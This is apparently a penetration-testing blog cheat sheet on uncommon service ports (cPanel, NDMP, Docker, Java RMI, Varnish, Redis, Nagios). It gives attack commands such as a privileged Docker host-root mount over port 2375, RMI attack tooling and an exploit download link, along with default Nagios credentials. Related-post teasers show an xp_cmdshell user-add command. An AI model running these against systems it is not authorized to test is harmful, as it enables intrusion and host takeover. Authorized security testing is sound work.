Skip to main content

UnCommon Ports

By

 

CPANEL Ports

cPanel	2082
cPanel - SSL	2083
WHM	2086
WHM - SSL	2087
Webmail	2095
Webmail - SSL	2096

SFTP Shared/Reseller Servers	2222
Webdisk	2077
Webdisk - SSL	2078
SSH Shared/Reseller Servers	2222


Plesk Control Panel	8880
Plesk Control Panel - SSL	8443
Plesk Windows Webmail (SmarterMail)	9998**
DotNet Panel	9001

10000/tcp - WebAdmin; MiniServ 2.021(Has few vulns)
Port 5601, 9200 - Kibana

NDMP

Port 10000 - NDMP
nmap -p 10000 --script ndmp-fs-info,vuln -sVC -d 10.10.10.10

Port 30000 - NDMPS
nmap -p 30000--script ndmp-fs-info,vuln -sVC -d 10.10.10.10

NetApp NDFS Common Ports  
Parallel Virtual File System (PVFS) 
TCP port 3334 - Heap Over flow
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389
Docker Port - 2375

2375: unencrypted docker socket, remote root passwordless access to the host
2376: tls encrypted socket, most likely this is your CI servers 4243 port as a modification of the https 443 port
2377: swarm mode socket, for swarm managers, not for docker clients
5000: docker registry service
4789 and 7946: overlay networking

docker -H 10.10.10.10:2375 run -it --rm --privileged -v /:/rootfs --net host --pid host busybox

check this out if you observer any issues
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616

#Tools to test RMI 
https://github.com/qtc-de/remote-method-guesser 
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 

java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum

Prometheus - Port 9100,9104

Monitoring Tool, go to IP:9100/metrics --> check to see if you can find any info 

https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-prometheus-metrics/

Varnish HTTP Cache Server - Port 6081,6082

apt-get install varnish

#Access the server
varnishadm -T 10.10.10.10:6081 

#Access with a secret key - bruteforce the key 
varnishadm -T 10.10.10.10:6081 -S SECRET_KEY

More info here

#VARNISH Request smuggling - CVE-2021-36740
https://www.cybersecurity-help.cz/vdb/SB2021080215 

Redis - port 5460

redis-cli -h 10.10.10.10 -p 5460

Tanium Client - Port 17472/tcp
SunOS RPC Vuln

https://www.giac.org/paper/gcih/262/sun-solaris-compromise-rpc-ttdbserverd-exploit/102732 

Get the exploit from here https://web.archive.org/web/20020309073405/http://packetstorm.decepticons.org/0008-exploits/rpc_ttdbserverd.c 

The program number 100083 exists on the host, then the service ttdbserverd is running. The TCP port number assigned for the portmapper to the ttdbserverd is 32775 - UDP


#find the service in nmap report 
grep -nr '100068  2,3,4,5    32800/udp   cmsd'
grep -nr '100083  1          32775/tcp   ttdbserverd'


Nagios

Usually it runs on Port 80 - http://10.10.10.10/nagios

Default Creds:

nagiosadmin  PASSW0RD
nagiosxi
nagiosuser
mysqladmin -u root -pnagiosxi password welcome

"user" => 'nagiosxi',
"pwd" => 'n@gweb',



Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Host and Application locally and access it over the internet via ngrock

By
 ngrock creates a tunnel from your local machine to ngrock server and host it on the internet via their HTTPS url  Resister an account on ngrock and login #Download the client curl -sSL https://ngrok-agent.s3.amazonaws.com/ngrok.asc \ | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null \ && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" \ | sudo tee /etc/apt/sources.list.d/ngrok.list \ && sudo apt update \ && sudo apt install ngrok #add the authToken ngrok config add-authtoken 2p7Oc #start a python server on your application python -m http.server 3000 #start the server - use the same port as the python server (3000 in below example) ngrok http http://localhost:3000 --request-header-add "ngrok-skip-browser-warning: true" Setting up a Request Header - Login to the application --> Univeral Gateway --> Edges - Create an Edge --> Request Headers --> `ngrok-skip-browser-warning :12 - go back to overv...
Post a Comment
Read more

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are: Azure Active Directory (AAD) Azure Resource Manager (ARM) Office 365 (O365) Initial Access Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges.  Entra ID Directory Role Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID. Types of Roles: Built-in Directory Roles Global Administrator Application Administrator User Administrator Custom Directory Roles Accessing APIs in Azure Entra ID - Access via Microsoft Graph API Endpoint {HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters} Azure Resource Manager API Endpoint (ARM-specific) {HTTP method} https://management.azure.com/{...
Post a Comment
Read more